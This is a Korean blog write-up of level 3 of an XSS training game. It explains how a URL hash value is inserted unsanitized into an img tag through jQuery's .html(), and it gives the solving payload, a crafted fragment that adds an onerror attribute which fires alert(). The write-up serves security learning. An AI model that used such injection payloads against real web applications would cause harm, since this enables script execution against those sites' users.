-
Xss game level 3 write-upWebHacking/Xss-game Write-Up 2018. 7. 17. 15:13
Xss game level 3 write up
#번역
미션 설명 : level 2에서 보았듯이 일부 일반적인 js기능은 실행입니다. 즉, 브라우저가 입력에 나타는 스크립트를 실행하게 됩니다. 때로는 이러한 사실은 상위 수준의 API에 의해서 기능이 숨겨집니다. 이 레벨의 응용 프로그램은 그러한 숨겨진 싱크를 사용하고 있습니다.
미션 목표: 이전과 마찬가지로 alert()를 사용한 팝업 스크립트를 삽입하세요.
애플리케이션의 어느 위치에든 페이로드를 입력할 수 없으므로 아래의 url 표시줄에서 수동으로 주소를 편집해야 합니다.
#분석
<!doctype html><html><head><!-- Internal game scripts/styles, mostly boring stuff --><scriptsrc="/static/game-frame.js"></script><linkrel="stylesheet"href="/static/game-frame-styles.css"/><!-- Load jQuery --><scriptsrc="//ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script><script>function chooseTab(num) {// Dynamically load the appropriate image.var html = "Image " + parseInt(num) + "<br>";html += "<imgsrc='/static/level3/cloud" + num + ".jpg'/>";$('#tabContent').html(html);window.location.hash = num;// Select the current tabvar tabs = document.querySelectorAll('.tab');for (var i = 0; i <tabs.length; i++) {if (tabs[i].id == "tab" + parseInt(num)) {tabs[i].className="tab active";} else {tabs[i].className="tab";}}// Tell parent we've changed the tabtop.postMessage(self.location.toString(), "*");}window.onload=function() {chooseTab(unescape(self.location.hash.substr(1)) || "1");}// Extra code so that we can communicate with the parent pagewindow.addEventListener("message", function(event){if (event.source == parent) {chooseTab(unescape(self.location.hash.substr(1)));}}, false);</script></head><bodyid="level3"><divid="header"><imgid="logo"src="/static/logos/level3.png"><span>Take a tour of our cloud data center.</a></div><divclass="tab"id="tab1"onclick="chooseTab('1')">Image 1</div><divclass="tab"id="tab2"onclick="chooseTab('2')">Image 2</div><divclass="tab"id="tab3"onclick="chooseTab('3')">Image 3</div><divid="tabContent"> </div></body></html>hint를 보았다!!
1. 버그의 원인을 찾으려면 Javascript가 사용자가 제공한 입력을 처리하는 위치를 확인하세요.
2. window.location 개체의 데이터는 공격자의 영향을 받을 수 있습니다.
3. 주입 지점을 확인했으면 새 HTML 요소에 들어가기 위해 할 일에 대해서 생각해보세요.
4. 브라우저가 페이지 로드 된 후에 추가된 스크립트를 실행하지 않기 때문에 이전과 마찬가지고 <script>를 사용하면 작동하지 않습니다.
window.onload=function() {chooseTab(unescape(self.location.hash.substr(1)) || "1");}이걸 이용하는거같은데 어떻게 이용하는걸까?
그 hint에서 3번을 보면 html요소에 들어가기 위해서 할일이라고 해서 코드를 보니 html에 들어가는 곳이 있다.
var html = "Image " + parseInt(num) + "<br>";html += "<imgsrc='/static/level3/cloud" + num + ".jpg'/>";$('#tabContent').html(html);img src가 저기 안에 있고, html로 들어가 적용시키고 띄우게 코딩되어있다. 그럼 level 2번에서 한 것처럼 똑같이 해보면 되지 않을까?
#익스
<img src="image.gif" onerror="myFunction()">
현재 문제창에는 url : https://xss-game.appspot.com/level3/frame#3 이렇게 떠있다.
onerror를 사용하기 위해서 https://xss-game.appspot.com/level3/frame#'4.png' onerror='alert("yeali")'> 이렇게 url창에 입력해준다!
'WebHacking > Xss-game Write-Up' 카테고리의 다른 글
Xss game level 6 write up (0) 2018.07.17 Xss game level 5 write up (0) 2018.07.17 Xss-game level 4 write up (0) 2018.07.17 Xss-game level 2 write_up (0) 2018.07.17 Xss-game level 1 write-up (0) 2018.07.17